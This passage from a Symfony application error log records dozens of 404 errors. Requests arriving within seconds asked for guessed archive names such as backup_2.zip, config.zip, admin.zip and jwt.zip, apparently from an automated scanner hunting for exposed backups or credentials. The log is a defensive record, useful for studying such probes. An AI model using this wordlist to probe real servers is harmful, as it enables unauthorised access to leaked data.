  3384. [2025-12-18 06:23:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_2.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_2.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3385. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3386. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3387. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /temp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /temp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3388. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_daily.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_daily.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3389. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cfg.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cfg.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3390. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tmp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tmp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3391. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /temporary.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /temporary.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3392. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /preferences.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /preferences.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3393. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /copy.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /copy.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3394. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back_up.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back_up.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3395. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /environment.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /environment.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3396. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /properties.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /properties.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3397. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrators.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrators.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3398. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3399. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3400. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ini.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ini.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3401. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /parameters.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /parameters.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3402. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /directadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /directadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3403. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dev.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dev.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3404. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /control.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /control.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3405. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /plesk.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /plesk.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3406. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /yaml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /yaml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3407. [2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dashboard.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dashboard.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3408. [2025-12-18 06:23:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /jwt.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /jwt.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3409. [2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3410. [2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /current.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /current.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3411. [2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /stable.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /stable.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3412. [2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /construct.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /construct.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3413. [2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /products.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /products.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3414. [2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /opencart.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /opencart.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3415. [2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /react.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /react.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3416. [2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mega.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mega.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3417. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /edge.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /edge.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3418. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /nodejs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /nodejs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3419. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /icloud.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /icloud.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3420. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rails.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rails.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3421. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /linkedin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /linkedin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3422. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cordova.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cordova.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3423. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /slack.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /slack.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3424. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /textures.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /textures.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3425. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /pinterest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /pinterest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3426. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /native.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /native.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
